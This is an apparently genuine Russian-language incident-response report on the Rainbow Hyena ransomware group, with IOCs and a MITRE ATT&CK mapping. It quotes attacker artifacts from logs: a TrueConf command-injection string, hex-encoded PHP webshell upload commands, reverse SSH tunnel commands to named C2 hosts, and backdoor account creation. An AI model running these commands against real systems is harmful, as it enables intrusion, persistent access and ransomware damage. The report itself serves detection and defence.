Всем привет, на связи команда DFIR JetCSIRT! Близится конец года, все готовят салаты и годовые отчеты. Мы тоже подводим итоги и заметили, что с одной из групп (или, по крайней мере, кластером злоумышленников) мы сталкивались чаще, чем с другими. Речь пойдёт о Rainbow Hyena — именно её активности мы посвящаем эту статью, разобрав несколько реальных кейсов.
Группа, известная как Rainbow Hyena (или PhantomCore), действует с 2022 года. Её атаки направлены на кражу данных и разрушение ИТ-инфраструктуры. Наряду с хактивистской мотивацией злоумышленники проявляют и финансовую заинтересованность, в частности, используют программы-вымогатели, основанные на исходных кодах Babuk и LockBit. Есть признаки связи с кластером Feral Wolf: совпадают TTPs и используемые инструменты.
Основной арсенал атакующих включает: LockBit, Babuk, Impacket, ADExplorer, Advanced IP Scanner, DumpIt.exe, memprocfs, Mimikatz, OpenSSH и другие утилиты.
Первый звоночек: начало года
В случае с Rainbow Hyena компании обычно обращались к нам уже после того, как данные были зашифрованы, а инфраструктура разрушена. Злоумышленники на тот момент уже переходили к следующей жертве, оставив записку с требованием выкупа за расшифровку.
Но были и счастливчики. Первый инцидент с этой группой произошел в начале года, когда центр мониторинга и реагирования Jet CSIRT зафиксировал подозрительную активность в инфраструктуре одного из заказчиков. Была обнаружена попытка кражи резервных доменных ключей (Data Protection API, DPAPI). DPAPI используется для шифрования паролей, сохранённых браузерами, закрытых ключей сертификатов и других конфиденциальных данных. Контроллеры домена хранят резервные главные ключи, которые можно использовать для расшифровки всех секретных данных, зашифрованных с помощью DPAPI на компьютерах в домене.
Оперативные меры реагирования позволили локализовать инцидент и обойтись без серьёзных последствий. На момент реагирования и расследования первого инцидента атрибутировать группу злоумышленников не удалось. Но с индикаторами с данного инцидента мы встретились еще не раз. Лишь после нескольких атак, в результате которых были зашифрованы данные разных компаний, мы поняли, какие последствия могли быть у того случая с DPAPI.
Тактики и техники Rainbow Hyena
1. Первоначальный доступ:
Злоумышленники применяют три основные техники первоначального доступа (MITRE ATT&CK):
T1190 – Exploit Public-Facing Application: эксплуатация уязвимостей сервисов, доступных из сети Интернет;
T1133 – External Remote Services: атаки, связанные с компрометацией сервисов для получения удаленного доступа к корпоративной сети (RDP, SSH, VPN…);
T1199 – Trusted Relationship: атак�� через подрядчиков с доступом в инфраструктуру.
В случае T1133 и T1199 мы наблюдали аномалии в паттернах удалённых подключений:
IP-адреса вне доверенных диапазонов
Подключения в нерабочее время
Несоответствие геолокации источника ожидаемым регионам
В случае Т1190 в ходе последних расследований мы установили, что злоумышленники перешли к активной эксплуатации уязвимости в сервисе для организации ВКС — TrueConf. Уязвимости присвоен идентификатор BDU:2025-10116: «Уязвимость TrueConf Server существует из-за непринятия мер по нейтрализации специальных элементов. Эксплуатация уязвимости может позволить нарушителю, действующему удаленно, выполнить произвольный код».
Уязвимость относительно свежая (август 2025г.) вероятно, еще будет какое-то время активно использоваться для получения первоначального доступа к корпоративным инфраструктурам. Стоит отметить что обновления для трех основных версий TrueConf Server, полностью исправляющие уязвимости, были выпущены до публикации публичной информации в БДУ ФСТЭК (версии TrueConf Server 5.5.1, 5.4.6 и 5.3.7).
Следы попыток её эксплуатации можно обнаружить:
1. В журналах TrueConf:
.\TrueConf\web_logs\log_2025-**.txt
[2025-**-**T17:29:18.612117+00:00] WebManager.INFO: TrueConf\WebManager\Classes\Server::generateRegistrationFile (server_id=a, server_name=aaa1111#vcs) [] []
[2025-**-**T17:29:18.612711+00:00] WebManager.INFO: Execute: "C:\Program Files\TrueConf Server\tc_server.exe/mode:1 /ServerID:a /ServerName:aaa1111#vcs /File:"C:\TrueConf\activation\offlinereg.vrg" [] []
[2025-**-**T17:42:36] WebManager.INFO: TrueConf\WebManager\Classes\Server::generateRegistrationFile (server_id=, server_name=xf1||powershell -c "sc -non -pat .1 -v ''"||#vcs) [] []
\TrueConf\web_logs\error2025-*.log: журнал ошибок также может содержать следы эксплуатации уязвимости
The filename, directory name, or volume label syntax is incorrect.
error: the required argument for option '--Serial' is missing
dir : Cannot find path 'C:\Program Files\TrueConf Server\httpconf\site\public\windows\' because it does not exist.
At line:1 char:1
+ dir c:windows\|sc ../private/css/c.css
2. В журналах PowerShell
2025-**-** 17:29:21, Event ID 600
Provider "Registry" is Started.
Details:
ProviderName=Registry
NewProviderState=Started
SequenceNumber=1
HostName=ConsoleHost
HostVersion=5.1.17763.7786
HostApplication=powershell -c ipconfig|sc ../private/css/c.css
2025-**-** 17:30:23, Event ID 400
Engine state is changed from None to Available.
Details:
NewEngineState=Available
PreviousEngineState=None
SequenceNumber=13
HostName=ConsoleHost
HostVersion=5.1.17763.7786
HostApplication=powershell -c ssh|sc ../private/css/c.css
В файл /Program Files/TrueConf Server/httpconf/site/private/css/c.css выводятся результаты выполненных команд злоумышленников;
3. При наличии мониторинга событий можно заметить подозрительные дочерние процессы (cmd.exe, powershell.exe) от имени процессов TrueConf (tc_webmgr.exe, tc_server.exe). В DFIR-кейсах, конечно же, расширенный аудит и события Event ID 4688 с командлайном — это роскошь для аналитиков, которая встречается крайне редко.
В результате эксплуатации уязвимости злоумышленники использовали возможность удаленно исполнить код и по частям загружали ВПО категории веб-шелл:
powershell -c ac -pat .1 -v '3c3f7068700a2069662028245f5345525645525b27524551554553545f4d4554484f44275d203d3d3d20275055542729207b2070617273655f7374722866696c655f6765745f636f6e74656e747328227068703a2f2f696e70757422292c20247075745f7661727329')
Из нескольких кусочков создается файл: «\Program Files\TrueConf Server\httpconf\site\public\index-api-deprecated.php», с которым в дальнейшем взаимодействуют злоумышленники
Кроме того, что не обновленная система TrueConf может стать точкой входа в инфраструктуру, она часто хранит чувствительные данные, например, аудио/видео-записи совещаний, конфиденциальную информацию о сотрудниках и клиентах компании. Возможно, стоит задуматься об ограничении и об аудите доступа к каталогам, которые хранят записи встреч (пример пути — «\TrueConf\Recordings»).
2. Развитие атаки:
Используя удобный интерфейс исполнения команд загруженного веб-шелла, злоумышленники развивали атаку: получали доступ к аутентификационным данным путем дампа оперативной памяти сервера с использованием:
DumpIt.exe — утилита для создания дампа оперативной памяти
memprocfs.exe — утилита для анализа дампов оперативной памяти
В случае с атаками через подрядчика зачастую скомпрометированные учетные данные имеют права локального администратора, этого более чем достаточно для развития атаки.
Далее следует этап внутренней разведки и изучения инфраструктуры. Злоумышленники перемещались внутри сети по RDP и SMB. В инцидентах фиксировались следы AdExplorer, Impacket, активно использовался PowerShell. Выполнялись типичные р��зведывательные команды на хостах:
whoami
quser
ping SRV-1
curl ifconfig.me
net share
get-adusers
Для повышения привилегий и кражи аутентификационных данных, помимо дампа оперативной памяти на узлах, злоумышленники проводили:
Дамп ветвей реестра операционной системы Windows;
Анализ содержимого доступных для чтения файлов (в том числе файлов 1CV8Clst.lst, которые содержат пароль доступа 1С в зашифрованном виде);
Атаки Kerberoasting;
Кражу локальной базы паролей Keepass;
Анализ файлов на хостах, содержащих пароли в открытом виде.
3. Сокрытие и маскировка:
В расследованных нами кейсах злоумышленники чаще действовали аккуратно и старались не создавать шума до последнего момента. Например, на скомпрометированных серверах создавались учетные записи, действия которых сливались с общим фоном легитимной активности:
net user USR1CV8 P@ssw0rd /add — маскировка под учетную запись 1С
net user audit1 P@ssw0rd /add - audit1 — маскировка под одну из служебных УЗ
Такие УЗ не вызывают мгновенных подозрений при беглом взгляде администратора, позволяя злоумышленнику закрепиться в системе.
Исполняемые файлы маскировались под важные легитимные компоненты инфраструктуры:
BrowserPlugin.exe — маскировка под имя плагина КриптоПро для работы с электронной подписью.
RedCheckAgentd.exe — имитация хостового агента сканера безопасности, чьё присутствие и сетевая активность считаются нормой.
4. Способ закрепления:
Злоумышленники использовали неочевидный инструмент и протокол для закрепления на Windows-узлах — SSH. Эта техника, а также использование одних и тех же управляющих серверов объединяют расследованные нами инциденты.
Следы создания reverse SSH-туннелей для скрытого доступа:
C:\Windows\System32\OpenSSH\ssh.exe -f -N -R 18412 -p443 qqiapiku@188.40.233[.]10
ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -o ServerAliveCountMax=15 -f -N -R 14235 -p443 deyttnxvtycumnyqzwfonui134698@akselerator.1cbit[.]dev
С комбинацией ключей -f и -N злоумышленник может превратить локальный сервер в SOCKS Proxy для дальнейшего горизонтального перемещения внутри корпоративной сети или закрепления в ней. Также данное соединение позволяет использовать инструменты для атаки, например, Impacket. В целях закрепления на некоторых узлах были сохранены подобные команды в задачах планировщика.
5. Заключительная фаза атаки:
Изучив инфраструктуру и получив доступ к привилегированным УЗ, злоумышленники выбирали способ распространения шифровальщика. Для этого требуется доступ к средствам автоматизации, поэтому уже типичная схема выглядит следующим образом:
Windows-инфраструктура шифровалась путем постановки задач через сервер управления Kaspersky Security Center. Эту технику взяли на вооружение многие другие группы.
Именно поэтому убедительно рекомендуем озаботиться защитой СЗИ и средств автоматизации. А также ознакомиться и применить необходимые меры защиты, которые указал вендор в харденинг-гайде, например, здесь:
Настройка списка разрешенных IP-адресов для подключения к Серверу администрирования KSC;
Использование двухфакторной аутентификации;
Запрет на сохранение пароля администратора;
Регулярный аудит всех пользователей и их действий.
Шифрование виртуальных машин осуществлялось вручную путем доставки на хосты виртуализации файла вируса-шифровальщика Babyk (имя файла /tmp/systemd) и его запуска. На ESXI-хостах версии 8 и выше включен параметр execInstalledOnly, благодаря чему исполнение недоверенных файлов заблокировано. Однако на этом этапе атаки злоумышленники уже имеют доступ к привилегированной УЗ и могут легко отключить этот параметр. При отключении execInstalledOnly отображается предупреждение в веб-интерфейсах vCenter и ESXi, а также регистрируется событие в журналах hostd.log, vobd.log, vmkernel.log:
2025-**-**T10:16:46.686Z In (14) vobd[65773]: [UserWorldCorrelator] 20742319us: [vob.uw.exec.installonly.disabled]
ExecInstalledOnly has been disabled. This allows the execution of non-installed binaries on the host. Unknown content can cause malware attacks similar to Ransomware.
Запуск «недоверенной» программы также будет зафиксирован в журналах ESXI:
2025-**-**T00:37:05.319Z In(14) vobd[2097658]: [UserWorldCorrelator] 36666240149115us: [vob.uw.exec.installonly.warning] Execution of non-installed file: /tmp/systemd
По итогу часть систем зашифрована на уровне ОС с помощью Lockbit, на уровне виртуализации — с помощью Babyk. Если злоумышленники находили бэкапы, то уничтожали их для нанесения максимального ущерба.
Другая часть систем зашифрована только на уровне виртуализации — с помощью Babyk, здесь в некоторых случаях удавалось извлечь критичные данные из поврежденной ВМ.
Рекомендации и индикаторы компрометации
Для повышения уровня защищённости от подобных инцидентов необходимо выполнить базовые рекомендации:
установить недостающие обновления (в данном случае TrueConf) и убрать лишние активы с внешнего периметра;
провести проактивный поиск угроз (Threat Hunting или Compromise Assesment);
провести харденинг: тренд на использование KSC в атаках не теряет актуальности, применение защитных мер, которые рекомендованы самим вендором, сильно усложнит жизнь злоумышленникам;
провести аудит доступа подрядчиков и настроить мониторинг: еще один тренд, который не теряет своей актуальности, это атака с использованием учётных записей подрядчиков. Доступ подрядчиков должен быть ограничен только необходимыми ресурсами, для подключения используется MFA.
Сетевые индикаторы компрометации:
IP-адрес | Описание |
45.144.30[.]5 | С2 Страна: Russian Federation |
217.60.2[.]97 | С2 Страна: Latvia Провайдер: CGI Global Limited |
94.131.15[.]153 | C2 Страна: Estonia |
23.184.48[.]215 | Страна: United States of America |
146.70.204[.]184 | VPN Страна: United Kingdom of Great Britain and Northern Ireland |
149.40.63[.]132 | Страна: United Kingdom of Great Britain and Northern Ireland |
185.253.98[.]82 | Страна: United Kingdom of Great Britain and Northern Ireland |
109.252.50[.]88 | Страна: Russian Federation |
2.20.33[.]159 | Страна: Belgium |
188.40.233[.]24 | С2 Страна: Germany |
188.40.233[.]10 | C2 Страна: Germany |
104.21.64[.]1 | Страна: United States of America |
104.21.112[.]1 | Страна: United States of America |
104.21.48[.]1 | Страна: United States of America |
104.21.32[.]1 | Страна: United States of America |
104.21.80[.]1 | Страна: United States of America |
104.21.16[.]1 | Страна: United States of America |
104.21.96[.]1 | Страна: United States of America |
195.133.145[.]111 | C2 Страна: Russian Federation |
5.253.204[.]187 | VPN Страна: Luxembourg |
130.195.245[.]5 | VPN Страна: Slovenia |
146.70.55[.]230 | VPN Страна: Belgium |
Домен | Описание |
local.tomskneft[.]com | Дата создания: 2025-01-01 00:00:00 Дата истечения: 2026-01-01 00:00:00 Страна регистранта: Ukraine |
akselerator.1cbit[.]dev | Дата создания: 2025-01-12T10:35:43Z Дата истечения: 2026-01-12T10:35:43Z Регистратор: Namecheap Inc. Страна регистранта: Island |
Hostname | Описание |
BITTRIX | Данный hostname фиксировался в журналах операционной системы при удаленных подключениях злоумышленников |
Файловые индикаторы компрометации:
Имя файла | SHA-256 | MD5 | Описание |
BrowserPlugin.exe RedCheckAgentd.exe SSH.exe | 62578d9bf1f2079968fb92352a535587e47c154b1556c31cb015a60109d0cf0b | 3981aadf77179aaa4a878affad9dbeff | Легитимное ПО SSH.exe |
Deprecated.php | 001d5cb61dc05a5821db85eae40142e1345ffb40c86bb46083fd0d1dbad3a7fb | c27828233a8c0756ffba98238511c815 | Веб-шелл, загружаемый в результате эксплуатации уязвимости в TrueConf |
MITRE ATT&CK:
Тактика | Техника | Описание |
Initial access | T1133 External Remote Services | Злоумышленники используют службы удаленного доступа с возможностью внешнего подключения для получения первоначального доступа к сети и (или) закрепления в ней |
Initial access | T1199 Trusted Relationship | Злоумышленники компрометируют УЗ подрядной организации, имеющей доступ к целевым системам |
Initial access | T1190 Exploit Public-Facing Application | Злоумышленники эксплуатируют уязвимости систем, доступных из сети Интернет. Например, популярные уязвимости MS Exchange — ProxyLogon, ProxyShell |
Initial access | T1078 Valid Accounts | Злоумышленники используют легитимные учетные данные для первоначального доступа, закрепления, повышения уровня привилегий или предотвращения обнаружения |
Execution | T1059 Command and Scripting Interpreter T1059. 001 PowerShell T1059. 003 CMD | Злоумышленники активно используют интерпретаторы командной строки и сценариев для выполнения команд или запуска сценариев и исполняемых файлов |
Persistence | T1136 Create Account T1136.001 Local Accounts T1136.002 Domain Accounts | Злоумышленники в ходе атак создают учетные записи для закрепления в инфраструктуре |
Persistence | T1078 Valid Accounts T1078.002 Domain Accounts | Злоумышленники используют скомпрометированные УЗ в ходе атаки |
Privilege Escalation | T1078 Valid Accounts T1078.002 Domain Accounts T1078.003 Local Accounts | Злоумышленники для повышения привилегий используют скомпрометированные легитимные доменные и локальные учетные записи
|
Defense Evasion | T1036 Masquerading: Match Legitimate Resource Name or Location | Злоумышленники маскируют используемое ВПО под другие легитимные программы |
Defense Evasion | T1562.001 Impair Defenses: Disable or Modify Tools | Злоумышленники отключают средства защиты, а также изменяют их настройки
|
Credential Access | T1003 OS Credential Dumping T1003.001 LSASS Memory | Злоумышленники получают аутентификационные данные из памяти процесса LSASS. |
Credential Access | T1552 Unsecured Credentials T1552.001 Credentials In Files | Злоумышленники ищут аутентификационные данные в доступных файлах на скомпрометированных узлах |
Credential Access | T1555.003 Credentials from Web Browsers | Злоумышленники проводят поиск сохраненных паролей в браузерах |
Credential Access | T1555.005 Password Managers | Злоумышленники проводят поиск сохраненных паролей в парольных менеджерах |
Discovery | T1046 Network Service Discovery | Злоумышленники проводят сканирование и поиск уязвимых ресурсов (Advanced IP Scanner, Advanced Port Scanner) |
Discovery | T1087.001 Account Discovery: Local Account | Злоумышленники собирают сведения о локальных и доменных группах используя команды whoami, net user, net group, Get-ADComputer |
Discovery | T1087.002 Account Discovery: Domain Account | Злоумышленники собирают сведения о локальных и доменных группах используя команды whoami, net user, net group, Get-ADComputer |
Discovery | T1069.001 Permission Groups Discovery: Local Groups | Злоумышленники собирают сведения о локальных и доменных группах используя команды whoami, net user, net group, Get-ADComputer |
Discovery | T1069.001 Permission Groups Discovery: Domain Groups | Злоумышленники собирают сведения о локальных и доменных группах используя команды whoami, net user, net group, Get-ADComputer |
Discovery | T1018 Remote System Discovery | Злоумышленники получают список других систем по IP-адресу, имени хоста в сети |
Discovery | T1083 File and Directory Discovery | Злоумышленники просматривают файлы и каталоги в скомпрометированных системах |
Discovery | T1217 Browser Information Discovery | Злоумышленники просматривают информацию, которая хранится в браузерах, чтобы узнать больше о скомпрометированных средах, а также завладеть аутентификационными данными |
Lateral Movement | T1021 Remote Services T1021.001 RDP T1021.002 SMB T1021.004 SSH | Злоумышленники используют службы удаленного доступа и протоколы удаленного доступа для перемещения внутри инфраструктуры. |
Lateral Movement | T1570 Lateral Tool Transfer | Злоумышленники передают инструменты или другие файлы между системами в скомпрометированных системах (например, SMB, RDP, PsExec) |
Command and Control | T1219 Remote Access Tools | Злоумышленники используют стороннее ПО для обеспечения удаленного доступа и установления интерактивного канала управления и контроля в целевых системах |
Command and Control | T1572 Protocol Tunneling | Злоумышленники для доступа к скомпрометированной системе используют туннели, построенные с использованием ssh |
Impact | T1529 System Shutdown/Reboot | Злоумышленники могут выключать/перезагружать системы, чтобы ограничить доступ к этим системам, снизить шансы на восстановление паролей и перезатереть данные в оперативной памяти |
Impact | T1486 Data Encrypted for Impact | Злоумышленники шифруют данные с целью получения выкупа |
Авторы:
Артем Семагин, ведущий аналитик киберкриминалистики, «Инфосистемы Джет».
Валерия Шотт, ведущий аналитик, «Инфосистемы Джет».
